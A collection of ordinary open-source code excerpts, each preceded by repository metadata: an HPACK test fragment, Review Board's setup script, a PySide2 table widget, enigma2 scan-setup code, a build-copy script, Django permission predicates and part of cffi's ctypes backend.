correct_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
assert correct_headers == decoded_headers
def test_can_encode_a_story_no_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=False)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
def test_can_encode_a_story_with_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
            # The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=True)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
|
asutherland/opc-reviewboard
|
setup.py
|
Python
|
mit
| 4,082
| 0.002695
|
#!/usr/bin/env python
#
# Setup script for Review Board.
#
# A big thanks to Django project for some of the fixes used in here for
# MacOS X and data files installation.
import os
import shutil
import sys
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
from setuptools.command.build_py import build_py
from distutils.command.install_data import install_data
from distutils.command.install import INSTALL_SCHEMES
from reviewboard import get_package_version, is_release, VERSION
# Make sure we're actually in the directory containing setup.py.
root_dir = os.path.dirname(__file__)
if root_dir != "":
os.chdir(root_dir)
# Tell distutils to put the data_files in platform-specific installation
# locations. See here for an explanation:
# http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
class osx_install_data(install_data):
# On MacOS, the platform-specific lib dir is
# /System/Library/Framework/Python/.../
# which is wrong. Python 2.5 supplied with MacOS 10.5 has an
# Apple-specific fix for this in distutils.command.install_data#306. It
    # fixes install_lib but not install_data, which is why we roll our own
# install_data class.
def finalize_options(self):
# By the time finalize_options is called, install.install_lib is
# set to the fixed directory, so we set the installdir to install_lib.
        # The install_data class uses ('install_data', 'install_dir') instead.
        self.set_undefined_options('install', ('install_lib', 'install_dir'))
install_data.finalize_options(self)
if sys.platform == "darwin":
cmdclasses = {'install_data': osx_install_data}
else:
cmdclasses = {'install_data': install_data}
PACKAGE_NAME = 'ReviewBoard'
if is_release():
download_url = 'http://downloads.reviewboard.org/releases/%s/%s.%s/' % \
(PACKAGE_NAME, VERSION[0], VERSION[1])
else:
download_url = 'http://downloads.reviewboard.org/nightlies/'
# Build the reviewboard package.
setup(name=PACKAGE_NAME,
version=get_package_version(),
license="MIT",
description="Review Board, a web-based code review tool",
url="http://www.reviewboard.org/",
download_url=download_url,
author="The Review Board Project",
author_email="reviewboard@googlegroups.com",
maintainer="Christian Hammond",
maintainer_email="chipx86@chipx86.com",
packages=find_packages(),
entry_points = {
'console_scripts': [
'rb-site = reviewboard.cmdline.rbsite:main',
],
'reviewboard.scmtools': [
'bzr = reviewboard.scmtools.bzr:BZRTool',
'clearcase = reviewboard.scmtools.clearcase:ClearCaseTool',
'cvs = reviewboard.scmtools.cvs:CVSTool',
'git = reviewboard.scmtools.git:GitTool',
'hg = reviewboard.scmtools.hg:HgTool',
'perforce = reviewboard.scmtools.perforce:PerforceTool',
'svn = reviewboard.scmtools.svn:SVNTool',
],
},
cmdclass=cmdclasses,
install_requires=[
'Django>=1.1.1',
'django_evolution',
'Djblets>=0.5.5',
'Pygments>=0.10',
'flup',
'pytz'
],
dependency_links = [
"http://downloads.reviewboard.org/mirror/",
download_url,
],
include_package_data=True,
zip_safe=False,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Software Development",
"Topic :: Software Development :: Quality Assurance",
]
)
|
dragondjf/PFramer
|
qframer/ftablewidget.py
|
Python
|
gpl-3.0
| 7,960
| 0.000126
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class FDragRowsTableWidget(QTableWidget):
    def __init__(self, rows=0, columns=2, parent=None):
        super(FDragRowsTableWidget, self).__init__(rows, columns, parent)
self.parent = parent
self.setEditTriggers(self.NoEditTriggers)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.viewport().setAcceptDrops(True)
self.setDragDropOverwriteMode(False)
self.setDropIndicatorShown(True)
self.setSelectionMode(QAbstractItemView.SingleSelection)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setDragDropMode(QAbstractItemView.InternalMove)
headerview = QHeaderView(Qt.Horizontal, self)
self.setHorizontalHeader(headerview)
self.setFocusPolicy(Qt.NoFocus)
self.verticalHeader().setVisible(False)
def dropEvent(self, event):
if event.source() == self and \
(event.dropAction() == Qt.MoveAction or
self.dragDropMode() == QAbstractItemView.InternalMove):
success, row, col, topIndex = self.dropOn(event)
if success:
selRows = self.getSelectedRowsFast()
top = selRows[0]
# print 'top is %d'%top
dropRow = row
if dropRow == -1:
dropRow = self.rowCount()
# print 'dropRow is %d'%dropRow
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
self.insertRow(r)
# print 'inserting row at %d'%r
selRows = self.getSelectedRowsFast()
# print 'selected rows: %s'%selRows
top = selRows[0]
# print 'top is %d'%top
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
for j in range(self.columnCount()):
# print 'source is (%d, %d)'%(row, j)
# print 'item text: %s'%self.item(row,j).text()
source = QTableWidgetItem(self.item(row, j))
# print 'dest is (%d, %d)'%(r,j)
self.setItem(r, j, source)
# Why does this NOT need to be here?
# for row in reversed(selRows):
# self.removeRow(row)
event.accept()
else:
            QTableView.dropEvent(self, event)
def getSelectedRowsFast(self):
selRows = []
for item in self.selectedItems():
if item.row() not in selRows:
selRows.append(item.row())
return selRows
def droppingOnItself(self, event, index):
dropAction = event.dropAction()
if self.dragDropMode() == QAbstractItemView.InternalMove:
dropAction = Qt.MoveAction
if event.source() == self and \
event.possibleActions() & Qt.MoveAction and \
dropAction == Qt.MoveAction:
selectedIndexes = self.selectedIndexes()
child = index
while child.isValid() and child != self.rootIndex():
if child in selectedIndexes:
return True
child = child.parent()
return False
def dropOn(self, event):
if event.isAccepted():
return False, None, None, None
index = QModelIndex()
row = -1
col = -1
if self.viewport().rect().contains(event.pos()):
index = self.indexAt(event.pos())
if not index.isValid() or \
not self.visualRect(index).contains(event.pos()):
index = self.rootIndex()
if self.model().supportedDropActions() & event.dropAction():
if index != self.rootIndex():
dropIndicatorPosition = self.position(
event.pos(), self.visualRect(index), index)
if dropIndicatorPosition == QAbstractItemView.AboveItem:
row = index.row()
col = index.column()
# index = index.parent()
elif dropIndicatorPosition == QAbstractItemView.BelowItem:
row = index.row() + 1
col = index.column()
# index = index.parent()
else:
row = index.row()
col = index.column()
if not self.droppingOnItself(event, index):
# print 'row is %d'%row
# print 'col is %d'%col
return True, row, col, index
return False, None, None, None
def position(self, pos, rect, index):
r = QAbstractItemView.OnViewport
margin = 2
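        # a drop within 2 px of a row's top/bottom edge counts as dropping
        # above/below that row; anywhere else inside the rect is "on" it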
if pos.y() - rect.top() < margin:
r = QAbstractItemView.AboveItem
elif rect.bottom() - pos.y() < margin:
r = QAbstractItemView.BelowItem
elif rect.contains(pos, True):
r = QAbstractItemView.OnItem
if r == QAbstractItemView.OnItem and \
not (self.model().flags(index) & Qt.ItemIsDropEnabled):
r = QAbstractItemView.AboveItem if pos.y() < rect.center(
).y() else QAbstractItemView.BelowItem
return r
class FDetailShow(QTextEdit):
def __init__(self, jsondata, parent=None):
super(FDetailShow, self).__init__(parent)
self.parent = parent
self.setText(jsondata)
self.setReadOnly(True)
self.installEventFilter(self)
self.setFocus()
def mousePressEvent(self, event):
if event.button() == Qt.RightButton:
pass
else:
super(FDetailShow, self).mousePressEvent(event)
class FTableItemDetailWidget(QFrame):
def __init__(self, jsondata, row, column, parent=None):
super(FTableItemDetailWidget, self).__init__(parent)
self.parent = parent
self.startX = 0
self.row = row
for i in range(column):
self.startX += self.parent.columnWidth(i)
self.setWindowFlags(Qt.Popup)
self.setFixedSize(self.parent.columnWidth(3), 220)
detailShow = FDetailShow(jsondata, self)
detailShow.setFixedSize(self.width(), 200)
self.titleLabel = QLabel("Data", self)
self.titleLabel.setAlignment(Qt.AlignCenter)
self.titleLabel.setObjectName("FTableItemDetailWidgetTitlebar")
self.titleLabel.setFixedSize(self.parent.columnWidth(3), 20)
mainlayout = QVBoxLayout()
mainlayout.addWidget(self.titleLabel)
mainlayout.addWidget(detailShow)
mainlayout.setSpacing(0)
mainlayout.setContentsMargins(0, 0, 0, 0)
self.setLayout(mainlayout)
self.installEventFilter(self)
self.show()
def eventFilter(self, obj, event):
if event.type() == QEvent.MouseButtonPress:
self.close()
return True
else:
return super(FTableItemDetailWidget, self).eventFilter(obj, event)
def showDetail(self):
self.jsonshowPosX = self.parent.mapToGlobal(QPoint(self.startX, 0)).x()
self.jsonshowPosY = self.parent.mapToGlobal(QPoint(self.startX, self.parent.rowViewportPosition(self.row))).y()\
- self.height() + self.parent.horizontalHeader().height()
self.move(self.jsonshowPosX, self.jsonshowPosY)
self.show()
def resizeEvent(self, event):
self.titleLabel.setFixedWidth(self.width())
|
OpenLD/enigma2-wetek
|
lib/python/Screens/ScanSetup.py
|
Python
|
gpl-2.0
| 68,521
| 0.030093
|
from Screen import Screen
from ServiceScan import ServiceScan
from Components.config import config, ConfigSubsection, ConfigSelection, ConfigYesNo, ConfigInteger, getConfigListEntry, ConfigSlider, ConfigEnableDisable
from Components.ActionMap import NumberActionMap, ActionMap
from Components.ConfigList import ConfigListScreen
from Components.NimManager import nimmanager, getConfigSatlist
from Components.Label import Label
from Components.Sources.StaticText import StaticText
from Tools.HardwareInfo import HardwareInfo
from Screens.InfoBar import InfoBar
from Screens.MessageBox import MessageBox
from enigma import eTimer, eDVBFrontendParametersSatellite, eComponentScan, eDVBFrontendParametersTerrestrial, eDVBFrontendParametersCable, eConsoleAppContainer, eDVBResourceManager
from Components.Converter.ChannelNumbers import channelnumbers
from boxbranding import getMachineBrand
def buildTerTransponder(frequency,
inversion=2, bandwidth = 7000000, fechigh = 6, feclow = 6,
modulation = 2, transmission = 2, guard = 4,
hierarchy = 4, system = 0, plpid = 0):
# print "freq", frequency, "inv", inversion, "bw", bandwidth, "fech", fechigh, "fecl", feclow, "mod", modulation, "tm", transmission, "guard", guard, "hierarchy", hierarchy
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = frequency
parm.inversion = inversion
parm.bandwidth = bandwidth
parm.code_rate_HP = fechigh
parm.code_rate_LP = feclow
parm.modulation = modulation
parm.transmission_mode = transmission
parm.guard_interval = guard
parm.hierarchy = hierarchy
parm.system = system
parm.plpid = plpid
return parm
def getInitialTransponderList(tlist, pos):
list = nimmanager.getTransponders(pos)
for x in list:
if x[0] == 0: #SAT
parm = eDVBFrontendParametersSatellite()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.polarisation = x[3]
parm.fec = x[4]
parm.inversion = x[7]
parm.orbital_position = pos
parm.system = x[5]
parm.modulation = x[6]
parm.rolloff = x[8]
parm.pilot = x[9]
tlist.append(parm)
def getInitialCableTransponderList(tlist, nim):
list = nimmanager.getTranspondersCable(nim)
for x in list:
if x[0] == 1: #CABLE
parm = eDVBFrontendParametersCable()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.modulation = x[3]
parm.fec_inner = x[4]
parm.inversion = x[5]
parm.system = x[6]
tlist.append(parm)
def getInitialTerrestrialTransponderList(tlist, region, skip_t2 = False):
list = nimmanager.getTranspondersTerrestrial(region)
#self.transponders[self.parsedTer].append((2,freq,bw,const,crh,crl,guard,transm,hierarchy,inv))
#def buildTerTransponder(frequency, inversion = 2, bandwidth = 3, fechigh = 6, feclow = 6,
#modulation = 2, transmission = 2, guard = 4, hierarchy = 4):
for x in list:
if x[0] == 2: #TERRESTRIAL
if skip_t2 and x[10] == eDVBFrontendParametersTerrestrial.System_DVB_T2:
# Should be searching on TerrestrialTransponderSearchSupport.
continue
parm = buildTerTransponder(x[1], x[9], x[2], x[4], x[5], x[3], x[7], x[6], x[8], x[10], x[11])
tlist.append(parm)
cable_bands = {
"DVBC_BAND_EU_VHF_I" : 1 << 0,
"DVBC_BAND_EU_MID" : 1 << 1,
"DVBC_BAND_EU_VHF_III" : 1 << 2,
"DVBC_BAND_EU_SUPER" : 1 << 3,
"DVBC_BAND_EU_HYPER" : 1 << 4,
"DVBC_BAND_EU_UHF_IV" : 1 << 5,
"DVBC_BAND_EU_UHF_V" : 1 << 6,
"DVBC_BAND_US_LO" : 1 << 7,
"DVBC_BAND_US_MID" : 1 << 8,
"DVBC_BAND_US_HI" : 1 << 9,
"DVBC_BAND_US_SUPER" : 1 << 10,
"DVBC_BAND_US_HYPER" : 1 << 11,
}
cable_autoscan_nimtype = {
'SSH108' : 'ssh108',
'TT3L10' : 'tt3l10',
'TURBO' : 'vuplus_turbo_c'
}
terrestrial_autoscan_nimtype = {
'SSH108' : 'ssh108_t2_scan',
'TT3L10' : 'tt3l10_t2_scan',
'TURBO' : 'vuplus_turbo_t'
}
def GetDeviceId(filter, nim_idx):
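	# figure out which device id (0 or 1) belongs to the tuner in slot
	# nim_idx when several tuners of the same model ('filter') are present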
tuners={}
device_id = 0
socket_id = 0
for nim in nimmanager.nim_slots:
name_token = nim.description.split(' ')
name = name_token[-1][4:-1]
if name == filter:
if socket_id == nim_idx:
break
if device_id: device_id = 0
else: device_id = 1
socket_id += 1
return device_id
class CableTransponderSearchSupport:
# def setCableTransponderSearchResult(self, tlist):
# pass
# def cableTransponderSearchFinished(self):
# pass
def __init__(self):
pass
def tryGetRawFrontend(self, feid):
res_mgr = eDVBResourceManager.getInstance()
if res_mgr:
raw_channel = res_mgr.allocateRawChannel(self.feid)
if raw_channel:
frontend = raw_channel.getFrontend()
if frontend:
frontend.closeFrontend() # immediate close...
del frontend
del raw_channel
return True
return False
def cableTransponderSearchSessionClosed(self, *val):
print "cableTransponderSearchSessionClosed, val", val
self.cable_search_container.appClosed.remove(self.cableTransponderSearchClosed)
self.cable_search_container.dataAvail.remove(self.getCableTransponderData)
if val and len(val):
if val[0]:
self.setCableTransponderSearchResult(self.__tlist)
else:
self.cable_search_container.sendCtrlC()
self.setCableTransponderSearchResult(None)
self.cable_search_container = None
self.cable_search_session = None
self.__tlist = None
self.cableTransponderSearchFinished()
def cableTransponderSearchClosed(self, retval):
print "cableTransponderSearch finished", retval
self.cable_search_session.close(True)
def getCableTransponderData(self, str):
#prepend any remaining data from the previous call
str = self.remainingdata + str
#split in lines
lines = str.split('\n')
#'str' should end with '\n', so when splitting, the last line should be empty. If this is not the case, we received an incomplete line
if len(lines[-1]):
#remember this data for next time
self.remainingdata = lines[-1]
lines = lines[0:-1]
else:
self.remainingdata = ""
for line in lines:
data = line.split()
if len(data):
if data[0] == 'OK':
print str
parm = eDVBFrontendParametersCable()
qam = { "QAM16" : parm.Modulation_QAM16,
"QAM32" : parm.Modulation_QAM32,
"QAM64" : parm.Modulation_QAM64,
"QAM128" : parm.Modulation_QAM128,
"QAM256" : parm.Modulation_QAM256 }
inv = { "INVERSION_OFF" : parm.Inversion_Off,
"INVERSION_ON" : parm.Inversion_On,
"INVERSION_AUTO" : parm.Inversion_Unknown }
fec = { "FEC_AUTO" : parm.FEC_Auto,
"FEC_1_2" : parm.FEC_1_2,
"FEC_2_3" : parm.FEC_2_3,
"FEC_3_4" : parm.FEC_3_4,
"FEC_5_6" : parm.FEC_5_6,
"FEC_7_8" : parm.FEC_7_8,
"FEC_8_9" : parm.FEC_8_9,
"FEC_3_5" : parm.FEC_3_5,
"FEC_4_5" : parm.FEC_4_5,
"FEC_9_10" : parm.FEC_9_10,
"FEC_NONE" : parm.FEC_None }
parm.frequency = int(data[1])
parm.symbol_rate = int(data[2])
parm.fec_inner = fec[data[3]]
parm.modulation = qam[data[4]]
parm.inversion = inv[data[5]]
self.__tlist.append(parm)
tmpstr = _("Try to find used transponders in cable network.. please wait...")
tmpstr += "\n\n"
tmpstr += data[1].isdigit() and "%s MHz " % (int(data[1]) / 1000.) or data[1]
tmpstr += data[0]
self.cable_search_session["text"].setText(tmpstr)
def startCableTransponderSearch(self, nim_idx):
def GetCommand(nim_idx):
global cable_autoscan_nimtype
try:
nim_name = nimmanager.getNimName(nim_idx)
if nim_name is not None and nim_name != "":
device_id = ""
nim_name = nim_name.split(' ')[-1][4:-1]
if nim_name == 'TT3L10':
try:
device_id = GetDeviceId('TT3L10', nim_idx)
device_id = "--device=%s" % (device_id)
except Exception, err:
print "GetCommand ->", err
device_id = "--device=0"
# print nim_idx, nim_name, cable_autoscan_nimtype[nim_name], device_id
command = "%s %s" % (cable_autoscan_nimtype[nim_name], device_id)
return command
except Exception, err:
print "GetCommand ->", err
return "tda1002x"
if not self.tryGetRawFrontend(nim_idx):
self.session.nav.stopService()
if not self.tryGetRawFrontend(nim_idx):
if self.session.pipshown:
self.session.infobar.showPiP()
if not self.tryGetRawFrontend(nim_idx):
self.cableTransponderSearchFinished()
return
self.__tlist = [ ]
		self.remainingdata = ""
|
Kimi-Arthur/Pimix
|
deploy.py
|
Python
|
mit
| 805
| 0
|
import os
import re
import shutil
destination = 'C:/Software/Pimix/'
apps = [
'fileutil',
'jobutil'
]
include_patterns = [
r'\.exe',
r'\.exe\.config',
r'\.dll',
r'\.pdb'
]
exclude_patterns = [
'FSharp',
'vshost'
]
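# A release artifact is copied only if its path matches at least one
# include pattern and none of the exclude patterns.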
os.makedirs(destination, exist_ok=True)
for app in apps:
for entry in os.scandir('src/{}/bin/Release/'.format(app)):
to_copy = False
for p in include_patterns:
if re.search(p, entry.path):
to_copy = True
break
if not to_copy:
continue
for p in exclude_patterns:
if re.search(p, entry.path):
to_copy = False
break
if to_copy:
shutil.copyfile(entry.path, '{}{}'.format(destination, entry.name))
|
uclouvain/osis
|
education_group/auth/predicates.py
|
Python
|
agpl-3.0
| 12,243
| 0.003921
|
from typing import Union
from django.conf import settings
from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _, pgettext
from rules import predicate
from base.models.academic_year import current_academic_year
from base.models.education_group_year import EducationGroupYear
from base.models.enums.education_group_categories import Categories
from base.models.enums.education_group_types import TrainingType
from education_group.auth.scope import Scope
from education_group.calendar.education_group_extended_daily_management import \
EducationGroupExtendedDailyManagementCalendar
from education_group.calendar.education_group_limited_daily_management import \
EducationGroupLimitedDailyManagementCalendar
from education_group.calendar.education_group_preparation_calendar import EducationGroupPreparationCalendar
from education_group.models.group_year import GroupYear
from osis_common.ddd import interface
from osis_role.cache import predicate_cache
from osis_role.errors import predicate_failed_msg, set_permission_error, get_permission_error
from program_management.ddd.domain import exception
from program_management.models.element import Element
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_training_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_mini_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_minitraining_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_trainings_removable(self, user, training_root):
training_roots = training_root.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, training_roots, 'base.delete_training')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_minitrainings_removable(self, user, minitraining_root):
minitraining_roots = minitraining_root.group.groupyear_set.all().select_related(
'education_group_type',
'management_entity',
'academic_year'
)
return _are_all_removable(self, user, minitraining_roots, 'base.delete_minitraining')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_groups_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'base.delete_group')
def _are_all_removable(self, user, objects, perm):
# use shortcut break : at least one should not have perm to trigger error
result = all(
user.has_perm(perm, object)
for object in objects.order_by('academic_year__year')
)
# transfers last perm error message
message = get_permission_error(user, perm)
set_permission_error(user, self.context['perm_name'], message)
return result
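# Hypothetical wiring sketch (not part of this module): predicates like
# these are combined into django-rules rule sets, along the lines of
#   rules.add_perm('base.delete_training', are_all_trainings_removable)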
@predicate(bind=True)
@predicate_failed_msg(
message=pgettext("male", "The user does not have permission to create a %(category)s.") %
{"category": Categories.GROUP.value}
)
def is_not_orphan_group(self, user, education_group_year=None):
return education_group_year is not None
# FIXME: Move to business logic because it's not a predicate (found in MinimumEditableYearValidator)
@predicate(bind=True)
@predicate_failed_msg(
message=_("You cannot change/delete a education group existing before %(limit_year)s") %
{"limit_year": settings.YEAR_LIMIT_EDG_MODIFICATION}
)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_year_older_or_equals_than_limit_settings_year(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return obj.academic_year.year >= settings.YEAR_LIMIT_EDG_MODIFICATION
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_all_scopes(self, user: User, obj: GroupYear = None):
return any(Scope.ALL.name in role.scopes for role in self.context['role_qs'] if hasattr(role, 'scopes'))
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_type_authorized_according_to_user_scope(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return any(
obj.education_group_type.name in role.get_allowed_education_group_types()
for role in self.context['role_qs']
if obj.management_entity_id in self.context['role_qs'].filter(pk=role.pk).get_entities_ids()
)
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not attached to the management entity"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_management_entity(
self,
user: User,
    obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
user_entity_ids = self.context['role_qs'].get_entities_ids()
return obj.management_entity_id in user_entity_ids
return obj
# FIXME: Move to business logic because it's not a predicate
@predicate(bind=True)
@predicate_failed_msg(message=_("You must create the version of the concerned training and then attach that version"
" inside this version"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_element_only_inside_standard_program(
self,
user: User,
education_group_year: Union[EducationGroupYear, GroupYear] = None
):
from program_management.ddd.repositories import program_tree_version
if isinstance(education_group_year, GroupYear):
element_id = Element.objects.get(group_year=education_group_year).id
try:
from program_management.ddd.domain.service import identity_search
node_identity = identity_search.NodeIdentitySearch.get_from_element_id(element_id)
tree_version_identity = identity_search.ProgramTreeVersionIdentitySearch(
).get_from_node_identity(
node_identity
)
tree_version = tree_version_identity and program_tree_version.ProgramTreeVersionRepository(
).get(tree_version_identity)
if tree_version and not tree_version.is_official_standard:
return False
except (interface.BusinessException, exception.ProgramTreeVersionNotFoundException):
pass
from program_management.ddd.repositories import load_tree_version
tree_versions = load_tree_version.load_tree_versions_from_children([element_id])
return all((version.is_official_standard for version in tree_versions))
return education_group_year
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_program_edition_period_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupPreparationCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened(
|
Widiot/simpleblog
|
venv/lib/python3.5/site-packages/cffi/backend_ctypes.py
|
Python
|
mit
| 42,086
| 0.001022
|
import ctypes, ctypes.util, operator, sys
from . import model
if sys.version_info < (3,):
bytechr = chr
else:
unicode = str
long = int
xrange = range
bytechr = lambda num: bytes([num])
class CTypesType(type):
pass
class CTypesData(object):
__metaclass__ = CTypesType
__slots__ = ['__weakref__']
    __name__ = '<cdata>'
def __init__(self, *args):
raise TypeError("cannot instantiate %r" % (self.__class__,))
@classmethod
def _newp(cls, init):
raise TypeError("expected a pointer or array ctype, got '
|
%s'"
% (cls._get_c_name(),))
@staticmethod
def _to_ctypes(value):
raise TypeError
@classmethod
def _arg_to_ctypes(cls, *value):
try:
ctype = cls._ctype
except AttributeError:
raise TypeError("cannot create an instance of %r" % (cls,))
if value:
res = cls._to_ctypes(*value)
if not isinstance(res, ctype):
res = cls._ctype(res)
else:
res = cls._ctype()
return res
@classmethod
def _create_ctype_obj(cls, init):
if init is None:
return cls._arg_to_ctypes()
else:
return cls._arg_to_ctypes(init)
@staticmethod
def _from_ctypes(ctypes_value):
raise TypeError
@classmethod
def _get_c_name(cls, replace_with=''):
return cls._reftypename.replace(' &', replace_with)
@classmethod
def _fix_class(cls):
cls.__name__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__qualname__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__module__ = 'ffi'
def _get_own_repr(self):
raise NotImplementedError
def _addr_repr(self, address):
if address == 0:
return 'NULL'
else:
if address < 0:
address += 1 << (8*ctypes.sizeof(ctypes.c_void_p))
return '0x%x' % address
def __repr__(self, c_name=None):
own = self._get_own_repr()
return '<cdata %r %s>' % (c_name or self._get_c_name(), own)
def _convert_to_address(self, BClass):
if BClass is None:
raise TypeError("cannot convert %r to an address" % (
self._get_c_name(),))
else:
raise TypeError("cannot convert %r to %r" % (
self._get_c_name(), BClass._get_c_name()))
@classmethod
def _get_size(cls):
return ctypes.sizeof(cls._ctype)
def _get_size_of_instance(self):
return ctypes.sizeof(self._ctype)
@classmethod
def _cast_from(cls, source):
raise TypeError("cannot cast to %r" % (cls._get_c_name(),))
def _cast_to_integer(self):
return self._convert_to_address(None)
@classmethod
def _alignment(cls):
return ctypes.alignment(cls._ctype)
def __iter__(self):
raise TypeError("cdata %r does not support iteration" % (
self._get_c_name()),)
def _make_cmp(name):
cmpfunc = getattr(operator, name)
def cmp(self, other):
v_is_ptr = not isinstance(self, CTypesGenericPrimitive)
w_is_ptr = (isinstance(other, CTypesData) and
not isinstance(other, CTypesGenericPrimitive))
if v_is_ptr and w_is_ptr:
return cmpfunc(self._convert_to_address(None),
other._convert_to_address(None))
elif v_is_ptr or w_is_ptr:
return NotImplemented
else:
if isinstance(self, CTypesGenericPrimitive):
self = self._value
if isinstance(other, CTypesGenericPrimitive):
other = other._value
return cmpfunc(self, other)
cmp.func_name = name
return cmp
__eq__ = _make_cmp('__eq__')
__ne__ = _make_cmp('__ne__')
__lt__ = _make_cmp('__lt__')
__le__ = _make_cmp('__le__')
__gt__ = _make_cmp('__gt__')
__ge__ = _make_cmp('__ge__')
def __hash__(self):
return hash(self._convert_to_address(None))
def _to_string(self, maxlen):
raise TypeError("string(): %r" % (self,))
class CTypesGenericPrimitive(CTypesData):
__slots__ = []
def __hash__(self):
return hash(self._value)
def _get_own_repr(self):
return repr(self._from_ctypes(self._value))
class CTypesGenericArray(CTypesData):
__slots__ = []
@classmethod
def _newp(cls, init):
return cls(init)
def __iter__(self):
for i in xrange(len(self)):
yield self[i]
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
class CTypesGenericPtr(CTypesData):
__slots__ = ['_address', '_as_ctype_ptr']
_automatic_casts = False
kind = "pointer"
@classmethod
def _newp(cls, init):
return cls(init)
@classmethod
def _cast_from(cls, source):
if source is None:
address = 0
elif isinstance(source, CTypesData):
address = source._cast_to_integer()
elif isinstance(source, (int, long)):
address = source
else:
raise TypeError("bad type for cast to %r: %r" %
(cls, type(source).__name__))
return cls._new_pointer_at(address)
@classmethod
def _new_pointer_at(cls, address):
self = cls.__new__(cls)
self._address = address
self._as_ctype_ptr = ctypes.cast(address, cls._ctype)
return self
def _get_own_repr(self):
try:
return self._addr_repr(self._address)
except AttributeError:
return '???'
def _cast_to_integer(self):
return self._address
def __nonzero__(self):
return bool(self._address)
__bool__ = __nonzero__
@classmethod
def _to_ctypes(cls, value):
if not isinstance(value, CTypesData):
raise TypeError("unexpected %s object" % type(value).__name__)
address = value._convert_to_address(cls)
return ctypes.cast(address, cls._ctype)
@classmethod
def _from_ctypes(cls, ctypes_ptr):
address = ctypes.cast(ctypes_ptr, ctypes.c_void_p).value or 0
return cls._new_pointer_at(address)
@classmethod
def _initialize(cls, ctypes_ptr, value):
if value:
ctypes_ptr.contents = cls._to_ctypes(value).contents
def _convert_to_address(self, BClass):
if (BClass in (self.__class__, None) or BClass._automatic_casts
or self._automatic_casts):
return self._address
else:
return CTypesData._convert_to_address(self, BClass)
class CTypesBaseStructOrUnion(CTypesData):
__slots__ = ['_blob']
@classmethod
def _create_ctype_obj(cls, init):
# may be overridden
raise TypeError("cannot instantiate opaque type %s" % (cls,))
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
@classmethod
def _offsetof(cls, fieldname):
return getattr(cls._ctype, fieldname).offset
def _convert_to_address(self, BClass):
if getattr(BClass, '_BItem', None) is self.__class__:
return ctypes.addressof(self._blob)
else:
return CTypesData._convert_to_address(self, BClass)
@classmethod
def _from_ctypes(cls, ctypes_struct_or_union):
self = cls.__new__(cls)
